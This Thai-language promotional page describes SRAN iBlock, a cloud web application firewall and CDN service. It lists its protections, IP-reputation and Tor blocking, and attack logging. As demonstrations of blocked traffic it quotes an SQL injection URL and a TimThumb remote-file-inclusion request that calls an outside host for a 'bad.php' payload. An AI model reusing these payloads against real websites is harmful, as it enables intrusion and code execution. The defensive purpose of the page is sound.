การป้องกัน การโจมตีแบบ DDoS / DoS สำหรับเว็บไซต์

เรื่อง DDoS/DoS เป็นเรื่องป้องกันยากแต่เราสามารถลดความเสี่ยงได้ ซึ่งทางทีมงานเราได้คิดค้นเทคนิคเรียกว่า

SRAN i[n] Block เป็นบริการหนึ่งของบริษัทโกลบอลเทคโนโลยี อินทรีเกรดเทค https://www2.gbtech.co.th จัดทำขึ้นมา

เพื่อวัถตุประสงค์ป้องกันเว็บไซต์ในประเทศไทยให้ปลอดภัยจาก ภัยคุกคามทางไซเบอร์ อีกทั้งเสริมประสิทธิภาพให้เว็บไซต์

ที่ใช้บริการมีการเข้าถึงข้อมูลได้อย่างรวดเร็ว ด้วยนิยามที่ว่า “Fast and Secure” โดยการให้บริการผ่านระบบคลาวด์คอมพิวติ้ง (Cloud Computing)

โดยผู้ใช้งานไม่ต้องลงทุนด้านฮาร์ดแวร์และซอฟต์แวร์ และใช้งานได้ทุกระบบปฏิบัติการ ไม่ต้องเปลี่ยนค่าโค้ดของเว็บไซต์

เพียงแค่ปรับเปลี่ยนค่าดีเอ็นเอส (DNS) ในเครื่องเว็บเซิร์ฟเวอร์ ใช้เวลาไม่เกิน 10 นาที เว็บไซต์ของหน่วยงานท่านก็จะมีความมั่นคงปลอดภัยทางข้อมูลมากขึ้น

หลีกเลี่ยงภัยคุกคามที่เข้าถึงเว็บไซต์ได้อย่างมีประสิทธิภาพ ประหยัดงบประมาณในการลงทุนป้องกันภัยเป็นลักษณะ Cloud Computer

ส่วนติดตั้งที่ Site งานเราจะใช้ร่วมกับอุปกรณ์ Net Optics รุ่น iBypass รวมเรียกบริการว่า

 

 

ด้วยเทคโนโลยีเครือข่ายอัจฉริยะที่ทางทีมงาน SRAN ได้พัฒนาขึ้นจะทำให้เว็บไซต์ที่ใช้บริการ iBlock สามารถหยุดยั้งภัยคุกคามที่เกิดขึ้นจากการโจมตีผ่านช่องทางเว็บแอฟลิเคชั่น (Web Application hacking) ไม่ว่าเป็นการโจมตีที่พยายามเข้าถึงระบบฐานข้อมูล , การโจมตีแบบ DDoS / DoS และอื่นๆ รวมมากกว่า 1,000 รูปแบบการโจมตี รวมถึงมีการให้บริการเสริมเพื่อทำการปิดกั้นการเข้าถึงข้อมูลด้วยชุดไอพีแอดเดรสแบบอำพรางตนเอง (Tor Network)  ซึ่งทำให้เว็บไซต์ของหน่วยงานมีความปลอดภัยจากนักโจมตีระบบมากขึ้น

 

ภาพแสดงขั้นตอนการทำงานของ IN Block Services

 

ขั้นตอนที่ 1 ก่อนใช้บริการ SRAN IN Block

เว็บไซต์ทั่วไปได้ถูกออกแบบมาให้มีการติดต่อสื่อสารแบบ Client – Server กล่าวคือมีการติดต่อผ่านอินเทอร์เน็ตแล้วเข้าเยี่ยมชมเนื้อหาบนเว็บไซต์ได้โดยตรง

เมื่อมีการจดทะเบียนชื่อโดเมนแนม และค่าไอพีแอดเดรสที่ได้จากผู้ให้บริการอินเทอร์เน็ต (ISP : Internet Services Provider) ซึ่งเป็นการติดต่อสื่อสาร

เว็บไซต์ทั่วไปโดยผู้ใช้งานจะสามารถเรียกข้อมูลได้โดยตรงโดยที่ไม่สามารถแยกแยะได้ว่าผู้ใช้งานดังกล่าวติดเชื้อหรือมีลักษณะถึงการโจมตีเว็บไซต์เจาะระบบข้อมูล

ซึ่งจะเห็นได้ว่าวิธีนี้ไม่ได้ช่วยในการป้องกันภัยที่อาจเกิดขึ้น ต่อมาได้มีการคิดค้นวิธีการป้องกันโดยนำเอาอุปกรณ์ป้องกันหรือเรียกว่า Web Application Firewall

ที่เป็นฮาร์ดแวร์ Appliance มาติดตั้งอยู่หน้าเว็บไซต์ซึ่งกรณีนี้จะทำให้ผู้ใช้งานต้องลงทุนในการติดตั้งและซื้ออุปกรณ์มาป้องกันภัยด้วยงบประมาณสูง

เป็นเหตุผลให้เกิดบริการ SRAN IN Block ขึ้นมาเพื่อให้เว็บไซต์มีความปลอดภัยและเข้าถึงข้อมูลรวดเร็ว อีกทั้งประหยัดงบประมาณไม่ต้องลงทุนซื้อฮาร์ดแวร์และซอฟต์แวร์

 

ขั้นตอนที่ 2 เมื่อใช้บริการ SRAN IN Block

ผู้ให้บริการเว็บไซต์ต้องทำการเปลี่ยนค่า DNS ในเครื่องเว็บเซิร์ฟเวอร์ เพื่อชี้ค่าไปที่ SRAN IN Block Center ซึ่งจัดทำบนระบบคลาวด์คอมพิวติ้ง (Cloud Computing)

เมื่อมีการอัพเดทค่า DNS ใหม่ ผู้ใช้งานทั่วไปเมื่อเปิดหน้าเว็บเพจที่ใช้บริการ SRAN IN Block ก็จะเข้าถึงข้อมูลได้อย่างปกติ แต่เพิ่มการป้องกันภัยและมีความรวดเร็วขึ้น “Fast and Secure”

 

ขั้นตอนที่ 3 ด้วยคุณสมบัติในการป้องกันการโจมตีระบบ (Web Application Firewall)

การอำพรางค่าไอพีแอดเดรสเพื่อวัตถุประสงค์โจมตีเว็บไซต์ ก็จะไม่สามารถทำได้โดยสะดวก ด้วยเทคโนโลยี SRAN IN Block

จะทำให้ลดความเสี่ยงที่จะเกิดขึ้นต่อเว็บไซต์หน่วยงานของท่านได้ และมีการจัดเก็บค่า Log File เพื่อให้สอดคล้องกับกับกฎหมายในประเทศไทย

ตามพระราชบัญญัติว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์อีกด้วย

 

SRAN I[N] block จะทำให้เว็บไซต์และโดเมนของคุณปลอดภัยขึ้นด้วยคุณสมบัติดังต่อไปนี้

1. ระบบรักษาความมั่นคงปลอดภัยทางข้อมูล (Web Application Security)

โดยมีรูปแบบการป้องกันตามมาตรฐาน OWASP และรูปแบบการโจมตีมากกว่า 1,000 รายการ ซึ่งมีการโจมตีหลักๆ ที่เป็นภัยอันตรายต่อเว็บไซต์ดังนี้

• การป้องกันการโจมตีลักษณะ XSS (Cross site scripting)
• การป้องกันการโจมตีลักษณะ
• การป้องกันการโจมตีลักษณะ RFI (Remote Files Inclusion) และการยิงโค้ด Exploit ที่มีผลกระทบต่อระบบ
• การป้องกันการใส่ค่า character in request ที่ส่งผลกระทบต่อระบบเว็บไซต์
• การป้องกันการพยายามเข้าถึงระบบโดยการสุ่มเดารหัสผ่าน (Brute Force Password)
• การป้องกันการโจมตีชนิด DDoS/DoS
• การป้องกันจากการใช้เครื่องมือตรวจสอบช่องโหว่(Security Scanner)
• การป้องกันสแปมและบอทเน็ตในการเข้ามาสร้างความเสียหายแก่เว็บไซต์
• มีความสามารถตรวจจับ bot/crawler ที่เข้ามาสอดแนมข้อมูลในเว็บไซต์และแยกประเภทของบอทได้ว่ามีที่มาจากที่ไหน

2. ระบบป้องกันไอพีแอดเดรสที่ใช้ในการอำพรางตัวตน

เป็นฟังชั่นหนึ่งที่ช่วยลดความเสี่ยงจากนักโจมตีระบบที่มักจะต้องอำพรางค่าไอพีแอดเดรสของตนเองเพื่อทำการเจาะระบบ

ทาง SRAN iBlock จึงจัดทำระบบ “IP Reputation” เพื่อทำการคัดกรองค่าไอพีแอดเดรสที่เคยมีประวัติการโจมตี ไม่ว่าเป็น ดังนี้

• ไอพีที่เข้าบัญชีดำ ที่ติดในฐานข้อมูลกับหน่วยงานกลางที่เฝ้าระวังการโจมตี
• ไอพีจากการใช้โปรแกรมทอร์เน็ตเวิร์ค (Tor network)
• ไอพีที่เปิดมาใช้ค่าพร็อกซี่เซิร์ฟเวอร์ที่เปิดใช้แบบสาธารณะ จะมีการอัพเดทข้อมูลทุกวัน (Daily update)

3. ระบบ CDN (Content Delivery Network)

มีการวางระบบ เครือข่ายอัจฉริยะ จะติดตั้งระบบ ทำการเก็บค่าเรียกใช้งานหากมีการเรียกซ้ำก็สามารถเข้าถึงข้อมูลได้ทันที

อีกทั้งยังตั้งระบบ SRAN iBlock อยู่ในประเทศที่สำคัญตามจุดต่างๆ ที่มีผู้ใช้บริการทั่วโลก ได้แก่ประเทศญี่ปุ่น ประเทศอังกฤษ

ประเทศสหรัฐอเมริกา ประเทศสิงค์โปรและประเทศไทย เพื่อเพิ่มความเร็วในการเรียกดูเนื้อหาเว็บไซต์ในจุดที่ใกล้ที่สุด ของผู้ใช้งานเยี่ยมเข้าชมเว็บไซต์

4. ระบบจัดเก็บบันทึกข้อมูลจราจร (Log Files)

มีการจัดเก็บ บันทึกข้อมูลจราจรหรือ ตามพระราชบัญญัติว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์พร้อมทั้งสามารถสืบค้นหาข้อมูล

ลักษณะพฤติกรรมค่าไอพีแอดเดรส เพื่อใช้ในการหาผู้กระทำความผิดได้อย่างสะดวกและรวดเร็ว

โดยข้อมูลใน Log file สามารถบอกค่าได้ทั้ง 5W คือ Who , What , Where , When , Why ประกอบด้วย

• วันเวลา(When)
• ค่าไอพีแอดเดรส (Who)
• สถานที่ ได้แก่ ชื่อผู้ให้บริการ ชื่อสถานที่ของค่าไอพีแอดเดรส ผ่านเทคนิค และการระบุพิกัดตำแหน่งผ่านแผนที่ภูมิสารสนเทศ (Where)
• ค่าการเรียกค่าในเว็บไซต์ GET / POST และลักษณะการโจมตีเว็บไซต์ (What)
• ลักษณะการโจมตีเว็บไซต์เมื่อเทียบฐานข้อมูลช่องโหว่ และภัยคุกคามที่จะเกิดขึ้นต่อเว็บไซต์ที่ใช้บริการ(Why)ตัวอย่างการบริการ

 

ตัวอย่างการแสดงค่า Log file ของเว็บ www2.gbtech.co.th ที่ใช้บริการ SRAN In Block

ภาพตัวอย่างการแสดงค่า Log file การเข้าถึงข้อมูลเว็บไซต์ทั้งการเข้าถึงข้อมูลที่ปกติไม่มีการโจมตีและการพบการโจมตี ซึ่งค่าที่แสดงใน Log สามารถระบุได้ 5W

Who
What

IPAddress
ค่าGET/POST ที่ URL path

Where

สถานที่ชื่อ ISP, ชื่อหน่วยงาน ชื่อเมืองและชื่อประเทศ

When

เวลา

Why

 

ลักษณะการโจมตีเว็บไซต์เมื่อเทียบฐานข้อมูลช่องโหว่และภัยคุกคามที่จะเกิดขึ้นต่อเว็บไซต์ที่ใช้บริการ

ตัวอย่างการปิดกั้นการเข้าถึงเว็บไซต์จากการโจมตี ด้วยการโจมตี SQL injection

ตัวอย่างนี้เป็นข้อมูลจริงที่เกิดขึ้นกับเว็บไซต์ที่ใช้บริการ SRAN IN Block ได้แก่เว็บไซต์ https://www2.gbtech.co.th เมื่อมีการเรียกข้อมูลที่มีลักษณะเป็นการโจมตีระบบ

จากตัวอย่างในภาพจะเห็นว่านักโจมตีระบบใช้เทคนิคที่นิยมโจมตีเว็บไซต์หน่วยงานราชการในประเทศไทยคือการโจมตีแบบ “SQL injection”

เมื่อนักโจมตีระบบใช้ชุดคำสั่งป้อนเข้าใส่ช่อง URL ในบราวเซอร์ ดังนี้ http://www2.gbtech.co.th/site/html/search.php?lang=1-15UnION/**/SElecT%201,2,3,4…

เมื่อคำสั่งเข้าสู่เว็บไซต์ที่ใช้บริการ SRAN IN Block จะปรากฏข้อความแจ้งเตือนไปยังนักโจมตีระบบ โดยมีข้อความที่หน้าจอ

โดยมีทั้งภาษาไทยและอังกฤษว่า ภาษาอังกฤษ “You are not authorized to access this page. The system detected a possible attempt to compromise security.”

ภาษาไทย “ขออภัยที่ไม่สามารถให้คุณเข้าเยี่ยมชมเว็บไซต์ได้ เพราะการเรียกข้อมูลของคุณอาจส่งผลต่อความปลอดภัยเว็บไซต์

และมีความเสี่ยงต่อการกระทำความผิดตามพระราชบัญญัติว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์”

ภาพแสดงหน้าจอเมื่อมีการโจมตีเว็บไซต์ผู้ใช้บริการจะมีการปิดกั้นและขึ้นข้อความเตือน เมื่อมีการโจมตีที่ตรงตามเงื่อนไขก็จะพบว่า

นักโจมตีระบบจะไม่สามารถเข้าถึงหน้าเพจและข้อมูลในเว็บไซต์ในลักษณะการเรียกข้อมูลนี้ได้ และในหน้าบริการจัดการ SRAN IN Block ก็จะพบ Log file ที่เห็นที่มาของการโจมตีดังนี้

ภาพ Log file ที่พบการโจมตีระบบซึ่งจะสามารถระบุวันเวลา ค่าไอพีแอดเดรสนักโจมตีระบบ ระบบปฏิบัติการของนักโจมตีระบบ

และ ชนิดบราวเซอร์ที่ใช้ในการโจมตีระบบและสามารถใช้เป็นหลักฐานในการดำเนินคดีความได้

 

ตัวอย่างการปิดกั้นการเข้าถึงเว็บไซต์จากการโจมตี Remote Exploit ผ่านช่องโหว่ของ WordPress

เนื่องจาก WordPress เป็น CMS (Content Management System) ที่คนไทยและทั่วโลกนิยมใช้กันในการจัดทำเป็นเว็บไซต์หน่วยงานเพื่อเผยแพร่ข้อมูลกันเป็นจำนวนมาก

ตัวอย่างการโจมตี “Virtual just in Time Patch : TimThumb Remote Code Execution Vulnerability Exploit attempt” ซึ่ง TimThumb เป็น Plugins หนึ่งของ WordPress

เข้าโจมตีที่ http://www2.gbtech.co.th/wp-content/themes/TheCorporation/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.agmcmortgage.com%2Fbad.php

ก็จะพบหน้าแจ้งเตือนไปยังนักโจมตีระบบและระงับการเข้าถึงข้อมูลเว็บไซต์

ภาพหน้าจอแจ้งเตือนต่อนักโจมตีระบบเมื่อมีการพยายามโจมตีระบบด้วยการใส่โค้ดผ่านช่องโหว่ WordPress

แสดงค่าใน Log file จะพบวันเวลา และค่าไอพีแอดเดรสของนักโจมตีระบบ

ภาพ Log file ที่พบการโจมตีระบบซึ่งจะสามารถระบุวันเวลา ค่าไอพีแอดเดรสนักโจมตีระบบ ระบบปฏิบัติการของนักโจมตีระบบ และ ชนิดบราวเซอร์ที่ใช้ในการโจมตีระบบได้

 

ตัวอย่างการค้นหาข้อมูลการโจมตีจาก Log file

เมื่อผู้ใช้บริการ SRAN IN Block Services ต้องการค้นหาว่ามีค่าไอพีแอดเดรสของนักโจมตีระบบเว็บไซต์เกิดขึ้นเมื่อวันเวลาใดและเหตุการณ์อะไรนั้น

สามารถค้นหาได้ผ่านระบบสืบค้นซึ่งจะทำให้สืบหาการกระทำความผิดทางเทคโนโลยีได้อย่างสะดวกและรวดเร็วขึ้น

 

ตัวอย่างการค้นหา การโจมตีชนิด Cross Site Scripting

ภาพตัวอย่างการค้นหาความพยายามที่โจมตีเว็บไซต์ชนิด Cross site Scripting

ต้วอย่างการแสดงผลภาพรวมการโจมตีผ่านแผนที่ภูมิสารสนเทศ

ภาพการแสดงแผนที่การโจมตีจะทำให้ผู้ใช้บริการทราบว่าเว็บไซต์ของหน่วยงานเรานั้นถูกโจมตีจากประเทศใดบ้างซึ่งหากสีเข้มพบว่ามีการโจมตีสูง

จากภาพพบว่าเว็บไซต์ www2.gbtech.co.th ถูกโจมตีจากประเทศไทยเป็นจำนวน 2,373 ครั้ง ข้อมูลของวันที่ 18 มิถุนายน 2556

 

รายงานภาพรวมการโจมตีเว็บไซต์ที่ใช้บริการ SRAN IN Block

ภาพลำดับการโจมตีเว็บไซต์ด้วยเทคนิคต่างๆ 20 อันดับโดยวัดค่าจากจำนวนครั้งที่โจมตีจากมากไปน้อย

 

การป้องการเข้าถึงข้อมูลเว็บไซต์จากการอำพรางค่าไอพีแอดเดรส

ภาพเมื่อทำการเปิดโปรแกรม Tor network เพื่อจะทำการอำพรางไอพีแอดเดรสของตนเอง จากภาพจะได้ค่า IP คือ 173.254.216.69

และเมื่อทำการเปิดเว็บไซต์ www2.gbtech.co.th ก็จะถูกปิดกั้นและขึ้นข้อความเตือนเนื่องจากมีการอำพรางไอพีแอดเดรส

 

ปัจจุบันทั้งหมดอยู่ในบริการเรียกว่า

ที่ทางกลุ่ม SRAN Dev นำเสนอเพื่อเป็นทางเลือกหนึ่งในสินค้าบริการจากประเทศไทย